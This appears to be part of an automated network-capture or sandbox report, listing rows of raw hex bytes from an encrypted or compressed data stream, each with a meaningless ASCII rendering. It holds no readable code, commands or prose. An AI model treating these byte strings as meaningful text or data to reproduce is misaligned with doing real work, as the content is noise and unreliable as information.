                                                                                                                                                2022-09-29 12:51:48 UTC26960INData Raw: 90 9a c8 e2 7f 73 66 fd 4a 32 b1 29 73 2d e4 f1 a1 98 e4 27 15 75 9f ea 41 59 85 c2 87 42 73 2b 0e 84 40 40 ee c5 1a c3 22 5e 99 8f 2a e7 4b d6 31 91 5d 51 7e f8 c0 47 a7 7f 7d 03 ec 01 76 76 17 b6 a7 1d 20 be 80 d6 d2 d9 96 df 51 0e 1e d5 00 c4 1e 04 cf f7 ee 24 ca 85 d4 b3 b2 ce c1 03 39 1d 6b a8 f9 62 f7 10 2f c9 7a cc 2d 74 81 96 55 43 89 b6 62 0d 23 b6 83 15 bf de 83 28 a9 14 ed c6 92 dd b4 04 02 b9 d9 90 b7 a0 78 0a 6f 0b 4d 58 94 9d 87 5f 26 41 99 dc 38 d0 a1 c0 9f 94 2b 54 80 e9 f2 94 42 2f 9c f9 45 24 3d e9 b1 f3 1e 80 35 fa d3 7d 13 5e fb f6 19 f2 cd 74 42 d5 f5 17 65 6f b7 96 15 a7 86 6a 1e 65 f0 69 0e 47 80 c9 b6 d5 65 e4 a3 7e c6 92 1d 19 18 42 59 73 30 99 3d 64 df 26 1f a7 a5 dd aa b6 b3 99 30 f4 a1 47 28 9d 3e 39 bc 38 44 3f ec 22 8e f2 63
                                                                                                                                                Data Ascii: sfJ2)s-'uAYBs+@@"^*K1]Q~G}vv Q$9kb/z-tUCb#(xoMX_&A8+TB/E$=5}^tBeojeiGe~BYs0=d&0G(>98D?"c
                                                                                                                                                2022-09-29 12:51:48 UTC26962INData Raw: c9 3f 77 6d 67 2a 12 ff fa e2 66 af b5 bd bd 6e aa b6 f3 00 11 e3 82 1f 21 5c b6 d7 2c f3 fe 2a 8b d4 d0 2f bd 33 86 f7 b1 3b ab 68 8d 4d 73 5a 0f 75 4c ab b4 83 a0 b6 63 75 7d 53 2b 66 14 db cd 56 52 e1 71 53 0b 7c 77 f8 79 c4 d4 48 ce 96 b8 a6 57 29 9b 07 75 fb 67 f8 13 36 d9 d5 da 7d a1 c3 79 94 72 09 12 c5 f9 33 e8 12 ec b0 d7 af 11 70 f7 76 c8 a7 3b ee 73 92 d7 e2 59 5d a7 51 a6 b6 37 f8 2c e5 a0 dc 33 40 33 54 d2 c2 82 bb 79 de c6 45 b7 9b 89 06 75 16 4d 12 ef 9a 54 2f f1 95 40 58 93 4d f8 e9 fc ef c2 49 27 fd 9a 3b 38 85 57 ba 7d 71 30 ce 6c e2 21 47 2f 76 ea 24 b5 d0 30 06 f3 5e 5c 97 5c e5 d7 55 87 fc ad d2 7e 5f 29 ba d4 06 ba 5a 10 fc 68 e8 62 9e fc a3 2b ad af 3f 36 ba fd 6d a8 e3 31 c6 3f b6 e7 0b da 6c 5c 9e b3 b3 82 ff 14 b2 f8 e6 6e 7b d4
                                                                                                                                                Data Ascii: ?wmg*fn!\,*/3;hMsZuLcu}S+fVRqS|wyHW)ug6}yr3pv;sY]Q7,3@3TyEuMT/@XMI';8W}q0l!G/v$0^\\U~_)Zhb+?6m1?l\n{
                                                                                                                                                2022-09-29 12:51:48 UTC26963INData Raw: 18 d4 61 9a fb 6c f5 15 e3 56 89 cb 47 21 1d a6 11 36 39 ca 0e a4 be f8 40 0f 82 60 ff 54 8b ae b9 d1 7d 30 6c 9b 0c d0 3a e0 4f c7 7f 47 fa 38 57 8a 66 61 e6 dd 3f de 54 b2 6f 4c c5 ac 25 f1 d4 14 80 12 3a 63 23 7f 4e 3f 37 dc 2f 94 d1 6c 9e 1f 56 a1 0f ed da b6 19 2d b4 52 19 3d c9 9d 05 21 5a 4f 5a 21 ba 00 89 f0 9f 71 a1 c1 90 05 8e 8f 5d 96 a8 81 b8 dd 7a 77 e2 68 35 1e aa 72 a7 b9 71 b4 ed 72 a8 53 a7 b2 fa ba c3 c6 74 41 d2 2f fa 39 8a 4e e0 63 f5 a6 94 97 0c 06 88 a3 b5 88 e2 47 3b 41 60 25 9f c7 83 75 3c c8 55 b4 54 11 5c f1 6d 4f bd 1d 08 45 4d 26 01 ea 59 33 e3 a5 9c 48 6e 73 61 0e f6 58 57 b8 1c b2 fb 8e 42 39 df 11 81 1b 19 c3 4e 8a f9 2b 2d a1 b8 3f f0 09 7c b4 df 46 21 1d 37 78 39 cd bf 70 df 62 e4 64 f0 41 85 66 38 d3 6d a8 5e 62 0d 6e cc
                                                                                                                                                Data Ascii: alVG!69@`T}0l:OG8Wfa?ToL%:c#N?7/lV-R=!ZOZ!q]zwh5rqrStA/9NcG;A`%u<UT\mOEM&Y3HnsaXWB9N+-?|F!7x9pbdAf8m^bn
                                                                                                                                                2022-09-29 12:51:48 UTC26964INData Raw: 9f 16 a0 94 3a a1 56 2e cf a2 a5 ec 85 49 c7 d6 3c 4c a2 32 3b d9 28 45 01 90 77 d5 c2 4d a6 d3 42 29 67 6b 55 5a 97 af 39 b7 87 5d 69 a5 62 19 c0 49 a7 2e 7e 0b 02 3c 04 bf 5f 85 01 49 f4 a0 4f f5 ba 43 27 9c 0e 02 91 66 27 8a 4c da 43 3f 41 68 b2 b5 a9 a7 38 73 8b e1 15 e9 dd ea 99 0e 5a cb 1b 66 c0 a8 a5 49 92 29 92 7a 3a af 4a 21 54 b6 91 23 d3 33 8e f3 92 99 f6 ca 98 fb e5 86 3a 71 c5 0a f0 88 ee 15 78 24 96 32 69 b6 4c 6a d0 d4 8e 2d a6 e4 e4 56 87 30 49 1c 2f e7 2f c9 74 27 38 4e d0 6a ec d2 cf a7 a7 49 c3 d5 a7 55 df 8e 13 98 16 8b 47 3b 18 cf 25 ee 44 03 97 3f 19 bf 81 e7 de 56 b5 05 22 f1 25 02 1a e4 62 06 fb d6 de 80 85 59 03 40 34 69 1f be 9b 77 82 76 3b b9 6b aa 9a 84 e0 7f 91 51 b0 67 f5 cd 66 9d 99 56 d9 a9 f8 99 23 cf 57 0c 88 92 cc 17 e1
                                                                                                                                                Data Ascii: :V.I<L2;(EwMB)gkUZ9]ibI.~<_IOC'f'LC?Ah8sZfI)z:J!T#3:qx$2iLj-V0I//t'8NjIUG;%D?V"%bY@4iwv;kQgfV#W
                                                                                                                                                2022-09-29 12:51:48 UTC26966INData Raw: c6 88 55 6c 7d 46 78 1e fa c4 9c f1 cc 7c 1f f5 90 c2 f0 72 6c 0d 6f 96 26 da af e5 82 0e c6 6a 24 79 36 5c 2a c8 3d b4 4a 21 63 09 3f 71 54 bd c2 cd 86 dd ed b3 8e 74 59 e9 99 4b c9 fa 29 4a b6 68 18 c3 16 bb 82 77 07 db 4e af 7d 11 e4 34 cf 0d 84 43 8a ae 2e b2 ee 66 5f cc ff 10 25 5f a3 d4 c0 94 47 ee 3e 78 9c a2 b4 ec 3f 1a 22 2a 8d 99 9a dd 8a 0b 95 1e 9f 23 c7 fb f5 c5 6b 44 d6 7b a2 ee 81 c2 7c bb ef 3d 3c 99 9a 28 64 b3 51 39 5c 8c 25 1a d9 63 41 fc 25 44 6b f6 a9 28 61 c8 8d 0a 3f 99 18 f6 24 ab 86 46 18 66 11 a5 a5 05 04 3e 4d e8 ef 74 6d 4f d9 20 99 a3 98 1c f9 c2 02 57 d3 aa 97 01 df 31 06 e4 1d ee 90 40 17 78 e2 57 67 07 7d fd ac 81 7d 09 00 5d 75 a7 55 66 4d 79 b6 98 c3 b2 48 4c 0b 06 8f 6a d6 6c 83 56 b0 a0 88 57 c5 0c 29 c9 e7 40 59 f4 e5
                                                                                                                                                Data Ascii: Ul}Fx|rlo&j$y6\*=J!c?qTtYK)JhwN}4C.f_%_G>x?"*#kD{|=<(dQ9\%cA%Dk(a?$Ff>MtmO W1@xWg}}]uUfMyHLjlVW)@Y
                                                                                                                                                2022-09-29 12:51:48 UTC26967INData Raw: 83 00 72 1c c5 e2 a7 6f 76 c1 22 57 31 d0 9b e7 e4 fe 36 13 fa 88 9f 43 54 80 5b 38 7b 73 d8 02 49 b4 4d 9f 49 8f 0d ad d9 b9 96 f5 46 cc d1 81 e0 9d b2 f1 ca 69 53 8d e1 b8 be c7 ad b4 06 d4 46 ab 86 b5 9b 65 20 d3 7c b2 68 e1 65 b4 1d 6e 89 f4 37 fc ae f8 e7 33 a7 2a 89 bc 1a 44 94 7c 1b 41 f8 e2 0c 1c 57 33 aa ad 2c 45 d4 0a 86 ad 12 43 e7 a1 4c 26 ef 79 9b 62 0b 20 a8 b1 5a 41 ce 27 f6 c3 17 34 3b b1 dc bd b5 aa 85 95 bb 30 b3 50 e5 90 e9 b3 b8 10 f4 63 72 49 b6 56 e5 ed 67 26 a7 aa 91 a7 79 c2 24 b9 cd e2 2e 9e 7c e5 82 5f 0e b1 f4 d4 83 69 c0 b5 ed cc 1c 87 07 14 c2 13 15 cb 24 e8 4f ab 4c 73 b2 ee b9 10 80 76 f9 7c ed f2 09 5e 09 9f 4c 95 be fd ed 86 30 3f 33 63 a6 1d 86 72 c5 2a 8f 39 f6 12 ce b4 bf 86 37 a3 af 27 25 6c cf 61 00 5d cb b8 ad ae e7
                                                                                                                                                Data Ascii: rov"W16CT[8{sIMIFiSFe |hen73*D|AW3,ECL&yb ZA'4;0PcrIVg&y$.|_i$OLsv|^L0?3cr*97'%la]
                                                                                                                                                2022-09-29 12:51:48 UTC26968INData Raw: 4d dd 14 90 c8 72 24 98 66 d1 49 a2 3c 36 2f fe 2f 5e 8e 9d 5d b0 ab 6a 88 93 16 8e 74 7c 07 87 1c e2 f9 7b 0e 0f 5e 99 07 7a ba 5e 06 86 eb 6f 3d 38 58 3e 82 20 b5 7f 1f 0d 03 95 b9 88 ef 50 09 69 1f 3a 1f c1 cd a6 3a 4b ce 42 85 76 2c c3 de 3e 65 57 3b 0d 3c f1 a4 06 39 5a fe e7 12 0d 7d 07 e2 04 63 0b b3 5f c1 83 26 59 e4 d6 4e 18 63 d6 10 d8 a6 a3 99 f6 8a b5 dd bf a1 23 76 69 e8 9c 9a 62 09 3b 14 e0 4a cf ec f9 99 ac ab c2 41 c8 78 63 ff ae 12 f8 35 41 92 12 65 fb 51 76 db 99 09 6d a6 10 5f e2 a9 3c 08 8c 52 7d 7e b3 0e 65 a4 7e 25 95 0a 41 01 44 c4 4d 9f 86 91 8b ec e3 5a 76 37 ea bc a6 0d dd e2 ee 39 f9 a9 8b f9 b4 a9 f0 fd e0 4b 3a d4 c7 ac b5 e4 1b 67 f4 03 95 63 a8 e5 4d f2 e4 78 e1 c8 9c b7 42 b5 22 ff 4f e8 bd 95 b5 91 0b a3 6b 75 5e ec d6 00
                                                                                                                                                Data Ascii: Mr$fI<6//^]jt|{^z^o=8X> Pi::KBv,>eW;<9Z}c_&YNc#vib;JAxc5AeQvm_<R}~e~%ADMZv79K:gcMxB"Oku^
                                                                                                                                                2022-09-29 12:51:48 UTC26969INData Raw: 44 65 b7 82 83 73 97 79 6f b9 9b c7 f6 9a 6f c7 b4 91 57 75 98 cf ea 43 74 ff ff 19 4a b1 4c 10 3d fe 39 76 4e 60 8b 0e 78 79 2d 45 85 d5 78 f4 55 1c a0 8f 10 ca 22 39 f5 2c 0b bd 28 92 9d bc 84 53 aa 6e d5 9f 58 24 5a d3 bc 46 fb 5e 05 b3 29 20 27 e7 17 14 60 db 8b 85 b5 4c e6 19 6e 92 9f 33 58 d8 51 71 a8 c1 3a d2 63 1e 93 56 01 7b 4b db ac 00 68 e0 fc bb fc 7a a6 1f 4b 3b 80 b3 8e 57 1b 4b 0c 8d 46 d3 cf 22 d4 95 bf 86 c6 d5 33 57 62 80 3a 78 25 0a 54 80 10 0a bb 73 dd 4f 41 26 5c ca 0c be 1f 16 ef 89 df 05 e0 3c bb 33 8a b8 cc 67 c6 0a 6e 60 fb e6 46 7c f5 c4 05 10 6e 04 30 77 dc f1 c0 be 4d ee f6 d7 21 f5 ad 4a ef b3 55 1f 05 47 8d 68 46 c0 6c 57 92 e2 4f 3f 5b 76 e6 9b b5 d5 6c f1 7a 3c cc 8a 72 b9 80 ff 6a a6 61 97 5a d0 a1 24 15 30 4b 9c ca bf 10
                                                                                                                                                Data Ascii: DesyooWuCtJL=9vN`xy-ExU"9,(SnX$ZF^) '`Ln3XQq:cV{KhzK;WKF"3Wb:x%TsOA&\<3gn`F|n0wM!JUGhFlWO?[vlz<rjaZ$0K
                                                                                                                                                2022-09-29 12:51:48 UTC26985INData Raw: 70 c8 b0 a7 0e 26 89 86 c6 c5 5a 52 bf 79 20 ac 5b 1b 02 f4 dc 6b 9f 55 53 fc 6b ba 1d f5 c0 db 30 cb 65 40 95 1d 40 26 1c 17 1a 8e ec 80 df 1b 85 59 8a 26 f7 d3 6a 25 4f 29 fc c5 28 c8 21 48 4f 21 f1 d3 f8 40 fa b2 58 14 e5 20 eb 81 43 8f ca 89 58 08 f3 b9 cb 50 58 94 c9 b1 f5 30 0d da d1 4f 5b e7 f9 2c 5b dd aa 01 bd fb fb eb 20 cc d3 f4 b8 44 bf ed 63 37 de bd 08 85 71 46 ee 76 fd 2d c4 69 9e b3 a2 32 11 f6 33 e4 66 71 f9 d1 b2 ca 84 6a a4 95 be 87 7d 87 cb 22 52 39 7e e2 2d 84 9e d1 e6 33 8e f8 9a be 21 06 ac a3 af ce 96 38 51 12 ed a0 7a 9f 4d 5b 45 19 b7 d0 8a 8c fa 78 97 f7 4e 12 1e 0b 06 c2 1f 1e c7 df c4 0d fe ba 60 c9 00 97 13 72 d8 80 98 fc 9e fc cd 5f 33 ea e7 9a 67 f7 81 34 54 19 b0 82 19 fa 4a 2c 33 c0 24 22 2e b6 db 5f fc d5 2b 76 34 14 f6
                                                                                                                                                Data Ascii: p&ZRy [kUSk0e@@&Y&j%O)(!HO!@X CXPX0O[,[ Dc7qFv-i23fqj}"R9~-3!8QzM[ExN`r_3g4TJ,3$"._+v4
                                                                                                                                                2022-09-29 12:51:48 UTC27001INData Raw: 4a 6e 1f 04 49 af 04 41 cb 54 81 9a c8 a7 76 3e 45 42 25 11 cb 43 34 e0 95 27 e5 c6 60 35 54 84 63 60 4f 43 ec 5f cf ba 79 0c a3 95 cd 9e bd 45 0e 7f 2f 84 e5 da ec fe 91 1f 7c c4 22 68 ab ea 1e 6d 8e 5f fe 49 a4 a1 69 bb 8a 62 15 95 0b 60 63 dc b7 fb 04 c0 3c 4f bc ef c7 51 a0 a9 64 7d 51 97 82 26 a9 f7 f9 eb 6f c8 56 69 e5 f3 93 f9 39 37 1c 7a 8c 8e 85 50 f5 cd a2 0b 8d 1d ed b8 d2 8d 34 68 57 98 4d 76 57 89 93 f2 a4 b7 a9 ec ee e8 50 4e 9b 27 f1 45 22 a1 22 94 88 0a 7f 4c 2a 09 53 57 f7 8f 6d 64 06 52 34 15 66 d8 18 ee 43 59 ba a6 60 be 0f 7f 9c f3 4d e8 f4 c3 65 f7 01 be f0 de 00 d8 51 38 31 02 f2 aa 7b 45 58 89 d3 5c 8d 38 13 e2 c6 4f 2e 7f aa e9 6a 0e 91 6f 9c 4b 6f a9 88 a7 54 c7 7e 16 b9 0c 3d cd 84 8e 3e 4c f9 4b 59 f1 2f 57 1b f5 d5 76 93 e8 d3
                                                                                                                                                Data Ascii: JnIATv>EB%C4'`5Tc`OC_yE/|"hm_Iib`c<OQd}Q&oVi97zP4hWMvWPN'E""L*SWmdR4fCY`MeQ81{EX\8O.joKoT~=>LKY/Wv
                                                                                                                                                2022-09-29 12:51:48 UTC27017INData Raw: f8 b0 39 89 f6 a9 14 07 48 72 38 60 37 62 64 2d ae 15 69 51 6c 0b 38 a8 ea e8 7f 59 f9 6f ea 79 1b 96 82 1d 84 74 fd 6b 53 ed f6 33 88 93 4b 7c 8d 8d 57 fe 56 d5 a6 66 d8 05 8b 61 64 c6 11 fa 8e bd df e7 b3 0f c4 6b 5a 2f 3c 6c cf dc 8a 55 f0 98 42 e2 7c 69 f3 38 e9 3e 4b 5c bd b6 ed bc d5 45 78 09 64 5c f4 c5 b8 34 ed c5 af 7f 22 fc b2 9a 8c e5 1d fe 79 c8 e4 00 7f 32 12 df 1f 17 13 ce b1 51 7d 5d 5d 2c 50 52 8a 21 07 86 63 ac 9e ce 45 5b 6c 55 3a 08 ba ba 2b dc b1 ee c7 85 8f d8 39 c1 ae f1 56 0e c4 db 46 21 5a 82 ee f4 0b a7 d5 5b d1 2b 40 d4 67 40 51 ef be 00 09 09 33 ac 6e fc 70 1f 87 16 d1 f2 dc 5c 29 86 84 02 62 4a 9e 02 d1 c0 cf 3c 5c 0c e9 c1 7d f6 31 94 20 06 d0 cd 87 28 d8 31 aa f7 be 12 cb ed 7f 7c b1 1d 0b fc 47 83 d1 a1 e2 e3 4f 77 c1 94 e3
                                                                                                                                                Data Ascii: 9Hr8`7bd-iQl8YoytkS3K|WVfadkZ/<lUB|i8>K\Exd\4"y2Q}]],PR!cE[lU:+9VF!Z[+@g@Q3np\)bJ<\}1 (1|GOw
                                                                                                                                                2022-09-29 12:51:48 UTC27033INData Raw: 84 09 7d 3b 23 0a 7e 8d d4 8d 6c ff d6 3d 2d 39 0d c6 b0 c0 9d 54 61 61 16 0e d8 1d d5 ee 10 28 49 98 8c c9 f8 a7 ae 0f 5f 3f cd 7d c1 a5 82 b8 29 f1 70 a2 5f ee b3 aa dc e9 03 2e fd 53 87 8a b7 04 5c 40 8f 4f 5d 07 30 51 86 40 9e 8b b7 99 18 16 c5 5e 32 43 7e c9 2e ff 93 83 da 28 9d 31 8d 30 cc 49 0a 8c 40 1a da 78 24 0b 23 fc 97 93 03 3e 85 54 2b 01 a1 de 71 d7 f5 97 b7 a1 46 c0 7b bc bd 49 87 6e 54 c8 70 f6 8f 59 93 8c 7c 6d b6 46 93 fa 63 cf 06 7b 06 18 0b a6 c4 c0 fc 39 45 fd 97 c3 6e 9d a6 1b 17 67 d4 52 4e 30 45 05 06 44 6a de 8d fe 44 98 58 41 19 f1 4f f1 8e ae ef 48 0d 9b 02 0d 28 64 0d b3 69 bc 4f 5c 22 cf 01 81 06 87 f9 31 9f d7 23 45 13 da 37 7a f7 34 a2 10 1c d1 b2 39 c3 36 3d 76 9f 13 66 f0 d3 76 fb f5 49 0a 20 8c f5 25 34 69 2e 15 3e 29 6e
                                                                                                                                                Data Ascii: };#~l=-9Taa(I_?})p_.S\@O]0Q@^2C~.(10I@x$#>T+qF{InTpY|mFc{9EngRN0EDjDXAOH(diO\"1#E7z496=vfvI %4i.>)n
                                                                                                                                                2022-09-29 12:51:48 UTC27049INData Raw: 72 bb c7 c5 53 87 27 2d b5 8d f1 ae 7a 7b 6a 47 18 03 f8 d2 25 55 fc 59 e3 bf c0 c2 8c ee 92 68 06 b8 b7 a8 e3 66 81 80 3e 12 a0 52 40 d2 fb d9 27 67 f3 99 10 9e a9 8d 0a 5e c7 5e c4 49 11 0b ef 79 ef b8 51 ab e6 db b6 41 55 90 c2 80 c6 78 6a 8e f3 99 93 9f 45 62 38 0d 16 3e 27 ac 12 9b 00 d7 b7 60 94 80 d2 20 55 18 b3 6d db 69 50 37 15 61 de 47 ae f9 29 e8 b2 96 72 52 11 58 a1 75 3a 01 aa 49 ac 39 82 0d 2b 1a 22 bd b6 c0 0f ea da a9 36 ef b9 33 fe 88 12 c9 eb 18 c8 39 cf 01 67 1d de 48 31 76 f1 81 e8 37 31 7a 32 15 83 df 5f 97 da 77 ec a7 32 a7 87 94 ad 2e f8 f9 69 46 78 b7 d4 c0 82 9a f7 7b 50 60 01 59 62 35 ff 72 b9 2b 76 6d 99 5a 78 ca a5 c0 2c 74 5c 00 76 6a 17 15 69 24 91 c5 91 fe 1b 85 a8 d1 93 c1 bc 6b 14 b2 49 c1 e6 62 ac da ea a5 e2 79 29 f8 a8
                                                                                                                                                Data Ascii: rS'-z{jG%UYhf>R@'g^^IyQAUxjEb8>'` UmiP7aG)rRXu:I9+"639gH1v71z2_w2.iFx{P`Yb5r+vmZx,t\vji$kIby)
                                                                                                                                                2022-09-29 12:51:48 UTC27065INData Raw: 6f d5 c8 40 05 f1 62 2a e2 73 d5 b6 d8 a1 f0 f3 89 53 e0 ef c3 1d 42 ef 98 9f 83 7a e5 a8 1a 93 29 58 a0 8e e3 90 ed 0c 22 8d 1c a2 5a fa de 38 4d fd f8 05 17 91 69 19 f3 06 77 46 1a 86 10 b7 de 04 3e 79 b3 80 e9 90 d8 c4 1d d0 e7 2a 15 7f 55 e8 d4 c3 55 87 83 47 f9 88 d6 b2 7c 21 91 a5 56 bb 0e 3e af 72 a7 00 ee 67 9b 35 d4 c1 37 f3 d9 55 2f fd 67 a5 bb 69 d2 44 ac c3 ee b4 06 ba 52 75 93 ac d7 e0 bf 14 3d e6 28 05 37 64 83 fb e9 21 7c 91 48 fd de 4e f8 7e b1 ae 30 81 fc 74 47 a9 3e 70 d9 42 53 31 7d ba a9 60 00 14 8c 9a 22 9f c8 4b cf 0a 15 0b 6d a8 ee 0f a9 8f af 88 cd e8 e6 1d 49 b9 c0 d3 66 b1 98 f8 7e 59 e4 9d 14 81 f8 0e ef b7 a0 fa e2 1a e1 4f a1 98 f0 61 24 ae 25 3e 75 00 41 f0 3a 65 d8 ec 72 26 cc 42 7b ff 79 8c fa cc c9 b4 8f bc 4e 09 79 81 7f
                                                                                                                                                Data Ascii: o@b*sSBz)X"Z8MiwF>y*UUG|!V>rg57U/giDRu=(7d!|HN~0tG>pBS1}`"KmIf~YOa$%>uA:er&B{yNy
                                                                                                                                                2022-09-29 12:51:48 UTC27081INData Raw: 91 38 5e f1 1b 69 b5 8b 60 f2 c1 9f 05 ca f1 01 54 38 b5 7d 1d b7 04 90 93 84 aa 7d 2d 5c 41 a1 11 e6 22 05 1c 69 d6 59 cc 10 1d 00 1d e6 35 53 af d8 27 4f 53 4b 2e 75 31 85 49 2d 58 40 36 ff 5c e5 9c 54 d3 48 8f 4a 40 0d 3f f2 c2 57 b7 c8 6f ba 66 52 be 70 a1 68 94 c7 44 94 69 af b2 74 29 41 6e 9c 04 d7 65 5b ad a1 fd 5d 0c b0 5b 36 ea 4f f1 36 84 b1 7a 6b ad 30 44 0d 6e b4 b0 a1 f5 63 ce 32 51 32 e6 91 95 e8 75 d4 85 f3 d3 4f d4 54 59 70 73 71 10 63 3c d0 fa 8a 84 08 f4 6e 33 99 90 7d 5d c0 8d 8b 27 60 c4 01 86 98 b4 3f e8 b7 40 3e e5 63 72 47 c8 4f 47 d2 1a 57 28 35 23 13 7e 43 86 9e 05 98 cb 60 91 0c 75 57 3d 61 8b e1 b8 09 2f 32 bd 78 10 8e f3 70 74 7d 19 0b d2 e9 f2 6a 63 ff 65 3e 06 1b f2 dc 0e 98 dd 96 cd c5 de fc 8a 33 fc bc 9d c8 9a 99 69 2d f3
                                                                                                                                                Data Ascii: 8^i`T8}}-\A"iY5S'OSK.u1I-X@6\THJ@?WofRphDit)Ane[][6O6zk0Dnc2Q2uOTYpsqc<n3}]'`?@>crGOGW(5#~C`uW=a/2xpt}jce>3i-
                                                                                                                                                2022-09-29 12:51:48 UTC27097INData Raw: f2 c2 3a 96 28 d6 bd e3 8e 2c f6 be b7 cb d5 f5 95 76 cc 18 34 73 92 23 82 43 4f be a0 4f ee ee 9b 83 31 c3 25 17 37 7c 3b 27 dc 46 f5 18 65 51 92 68 13 59 7d a4 35 54 9f f3 66 e5 5f 82 5f ae f9 71 57 f4 28 9e b3 51 e6 d2 a3 a6 2b 49 f8 2e 31 44 10 72 12 03 9e ad 17 a0 5b 4d 40 88 5c da 98 58 63 cc ad 67 29 f6 ec 15 bd 62 56 c5 e9 f6 5f f3 60 53 2e 24 31 1c 73 3c 66 a0 4c ae 58 cb b2 33 2c f4 56 ee 9f 0d 42 19 fd e0 2f 78 58 69 47 dc 06 85 0d c5 45 ae 2b a7 f5 33 c1 ea 6b 54 11 f1 3f d4 4a 3d fd c0 7f aa ae 68 80 f9 d9 42 89 19 00 9f f6 72 d3 08 2f 0c 62 03 dc b7 75 be 00 83 5a 3a 6b fa db ee 67 09 cf 83 d6 03 d3 9b 86 29 bf b4 d7 1e a2 05 91 88 ed 8f 26 14 71 36 ea 49 66 02 41 fb b5 c8 5c 10 ba 70 c5 d3 ac b9 8c 15 d1 c9 02 2f f5 e2 09 bd 5b ab 0d b0 91
                                                                                                                                                Data Ascii: :(,v4s#COO1%7|;'FeQhY}5Tf__qW(Q+I.1Dr[M@\Xcg)bV_`S.$1s<fLX3,VB/xXiGE+3kT?J=hBr/buZ:kg)&q6IfA\p/[
                                                                                                                                                2022-09-29 12:51:48 UTC27113INData Raw: 20 d3 7a a1 1d 28 2f 62 74 00 3a d0 ae 0f 93 09 46 eb f3 65 1a f1 16 7f 04 df de fb 9a 7d 86 31 4b 51 94 d0 29 f7 29 05 f3 b2 17 0b e0 1f f1 83 6b a7 59 db e7 fd 0b d6 f1 62 d5 51 c8 c2 b4 ef 46 2d 7a 7b 7e 67 a2 ca 35 37 19 aa 1b 05 3f d2 af ea 78 17 22 b5 03 0a 8b 20 85 57 2e 24 a1 a6 19 bc 1d 7f 9e e3 6a 78 53 6c fd 82 b9 35 3f 46 0e f5 42 68 fc 5b 1c 45 05 ee ce 7a 6b 8a 54 66 7f 43 fe 02 3f 73 d5 56 32 d5 e6 e9 70 47 28 16 84 61 65 80 d8 32 46 3d 1d 69 f4 52 16 50 20 73 9a 44 ae 28 93 d5 2e e5 cd ff 7e 0d 97 0c 22 c3 16 e2 d6 b9 7d d8 2c 77 bb 71 10 da d4 7d 4f 9b 4a 9b 7a c9 77 17 f0 e6 14 d8 b1 16 6f a8 85 21 0b 27 ae 10 eb a9 45 3a 2f c3 37 a6 a7 ce 97 ba 4c d4 d6 52 5e b2 ee 28 95 f3 8b 55 47 6c 7f 82 47 29 e7 15 ba 46 b3 27 0a 3e 90 13 5f 80 33
                                                                                                                                                Data Ascii: z(/bt:Fe}1KQ))kYbQF-z{~g57?x" W.$jxSl5?FBh[EzkTfC?sV2pG(ae2F=iRP sD(.~"},wq}OJzwo!'E:/7LR^(UGlG)F'>_3
                                                                                                                                                2022-09-29 12:51:48 UTC27129INData Raw: 38 1c 77 0d 63 f7 eb bc 83 a3 7d 91 ac c3 b5 96 d1 48 7f 49 c3 c9 72 80 55 d7 b5 bc de 7f e1 97 a1 17 81 68 58 89 07 34 e2 58 a7 e6 6f 88 98 71 b9 b2 be f0 15 0f d1 22 e4 0f e6 bc da 5b 9b 3f ab da 1c 9f e9 17 8c a5 b6 79 d7 e7 c4 5a bd e7 fe b7 38 1e dd 09 29 5b a7 7b 5d 9e ce b5 19 7b 59 c4 c5 47 7f fb 1c 69 8a a4 12 8a 80 33 ea aa d8 78 f1 91 68 0b 8b eb d3 3b 0b 81 15 91 e4 cf 99 ed f0 41 9c 67 92 d5 41 d4 31 c3 fa 31 53 3b d1 82 1d a7 f8 82 86 e8 80 1e af cf 15 5b 8e 59 f5 cd 09 e8 8c 30 7d 82 9a 95 d9 33 d1 74 58 0e e2 51 53 41 fa 06 7b db ff 07 ee eb 25 50 72 54 ea c8 2a 89 11 6f 44 ac b4 f9 6e f9 51 3c b4 d3 8f 26 f8 2b 31 73 44 70 59 d1 95 9e ba 27 0b 60 c5 80 4d 23 13 9a f0 92 06 3c 0a 1a 75 9e 3c 7c 1f 1e b6 ef a1 05 5f 1a 82 9c b2 ee 18 cb b2
                                                                                                                                                Data Ascii: 8wc}HIrUhX4Xoq"[?yZ8)[{]{YGi3xh;AgA11S;[Y0}3tXQSA{%PrT*oDnQ<&+1sDpY'`M#<u<|_
                                                                                                                                                2022-09-29 12:51:48 UTC27145INData Raw: de bc 3b f0 ae de b1 2b fc 6e 13 4c 10 ec ac 4e 47 7a ce 87 b5 0b 55 4f b1 cb 53 a1 b8 b6 d5 f3 c7 25 a3 68 d4 03 2e fc c1 28 55 cb 9a 6a e1 8d c0 ca 3b f7 4d 25 d7 cf d4 ff 5e 77 8a b7 49 c2 11 6b ec b0 fa 47 60 54 b5 e8 4c a7 35 2c 00 c7 04 7b 9f 84 b6 ff c7 af 19 d9 de c6 71 71 da 36 56 33 ff 1c 38 37 f7 66 1d 41 e7 1a 18 09 24 df 49 76 74 22 31 24 a4 c8 f5 e2 c9 0c 58 07 7f d0 bf bb ab 13 e1 32 6d 00 6d 04 cd 70 25 ed 67 37 42 1b 4a 59 39 30 5f 3e 9c 23 c5 2b 81 ee 7e 81 d8 2b 68 80 c9 f3 e3 01 9d d6 fa d9 60 c0 82 ad 62 e3 2e 28 a2 80 b8 4d ad e9 0f 02 c6 25 da 89 4e b3 ca 58 38 5b c7 aa 42 1a b0 4f ba cd cf f8 dc 9f 4c 2d 11 70 ef 3d cf 41 bd df b5 73 91 92 36 f0 b3 c8 9a 43 67 d0 2e 67 5c 14 70 fb 7e 3a 8b 2d 8d 72 fc 43 6c 8b aa 51 40 09 34 eb 40
                                                                                                                                                Data Ascii: ;+nLNGzUOS%h.(Uj;M%^wIkG`TL5,{qq6V387fA$Ivt"1$X2mmp%g7BJY90_>#+~+h`b.(M%NX8[BOL-p=As6Cg.g\p~:-rClQ@4@
